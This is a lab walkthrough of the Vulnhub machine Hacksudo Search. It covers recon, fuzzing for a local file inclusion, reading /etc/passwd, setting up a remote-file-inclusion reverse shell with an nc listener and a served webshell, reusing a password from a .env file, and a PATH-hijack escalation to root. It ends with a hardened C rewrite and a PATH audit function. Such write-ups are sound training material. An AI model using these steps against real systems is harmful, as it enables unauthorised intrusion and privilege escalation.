In this post, I am going to walk through a machine from Vulnhub called Hacksudo Search. In this writeup, I will explain all the steps to get to the root user.
Link to the machine: https://www.vulnhub.com/entry/hacksudo-search,683/
All walkthroughs: https://nepcodex.com/tag/walkthrough/
Identify the target
First of all, I have to identify the IP address of the target, so I use a tool called netdiscover for this.
sudo netdiscover -i eth0 -r 10.0.2.1/24
Next, I have to scan for open ports.
Scan open ports
nmap -T4 -sC -sV -p- --min-rate=1000 10.0.2.21
Here, I found that ports 80 and 22 are open, so I am going to see what the website offers. However, there is nothing important on the main page: it only has a search box that fires up a Google search.
Now, I have to do directory enumeration on the web server.
Directory Enumeration
gobuster dir -u http://10.0.2.21 -x html,txt,php --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Here, I found an interesting page that is similar to the main page. Hence, I looked around the page for vulnerabilities.
I found compelling evidence of Local File Inclusion (LFI) and Remote File Inclusion (RFI). However, I had no luck exploiting it.
Fuzz
When fuzzing, I generally try different combinations of known parameters, and that is how I know that the parameter ‘me’ is vulnerable to LFI. However, for the purpose of this walkthrough, I am going to use wfuzz.
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://10.0.2.21/search1.php?FUZZ=contact.php" --hl 137
The parameter “me” gave a different response, which matches the result of my manual inspection. Subsequently, I read the /etc/passwd file through the LFI to view the users of the machine.
Now, I can try the RFI vulnerability. For that, I copied a reverse-shell webshell, served it over HTTP and listened on the port.
nc -nlvp 4444 # Listen on port 4444
# Copy the webshell and change its IP and port to 10.0.2.15 and 4444 respectively
python3 -m http.server 9000
In the /var/www/html directory, I found a .env file containing a possible password for one of the users. Hence, I tried that password against the users listed in the passwd file.
Finally, I got the user's shell, and I will log in using SSH.
Privilege escalation to root
After I got the user's shell, I had to escalate privileges.
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
I found an SUID binary and its source that could get me root access.
As we can see above, the binary runs “install” by name, so it is resolved through the PATH. Now, I can create my own “install” that gives me a root shell.
cd /tmp
echo '/bin/bash -i' > install # Our own "install", found before the real one
chmod +x install
cd ~/search/tools/
export PATH=/tmp/:$PATH # Put /tmp first in the PATH
./searchinstall -p
Finally, we got the root shell and the root flag as well.
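As an added example (not code from the machine or from this post), here is how the SUID helper could have been written so that the PATH trick above no longer works, together with a small audit function that flags a PATH containing an empty, relative, non-root-owned or world-writable entry such as /tmp. The /usr/bin/install location and the function names are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hardened form of the SUID helper. The original resolves "install"
 * through the caller's PATH; here the program path is absolute, no shell
 * is involved, and the child gets a fixed environment instead of the one
 * inherited from the unprivileged caller. /usr/bin/install is assumed. */
int run_install_hardened(const char *flag) {
    char *const argv[] = {"/usr/bin/install", (char *)flag, NULL};
    char *const envp[] = {"PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL};
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);   /* no PATH search takes place */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Audit helper: returns 1 if a lookup through this PATH could land in a
 * directory the caller controls (an empty or relative entry, or an existing
 * directory that is world-writable or not owned by root), otherwise 0. */
int path_is_hijackable(const char *path) {
    char dir[4096];
    const char *p = path;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t n = end ? (size_t)(end - p) : strlen(p);
        if (n == 0 || p[0] != '/' || n >= sizeof dir) return 1; /* cwd lookup */
        memcpy(dir, p, n);
        dir[n] = '\0';
        struct stat st;
        if (stat(dir, &st) == 0 && S_ISDIR(st.st_mode) &&
            (st.st_uid != 0 || (st.st_mode & S_IWOTH)))
            return 1;                  /* e.g. /tmp with mode 1777 ends here */
        if (!end) return 0;
        p = end + 1;
    }
}
```

Checking `path_is_hijackable(getenv("PATH"))` from within a privileged helper before it spawns anything is a cheap guard, but the real fix is the fixed environment and absolute path shown in `run_install_hardened`.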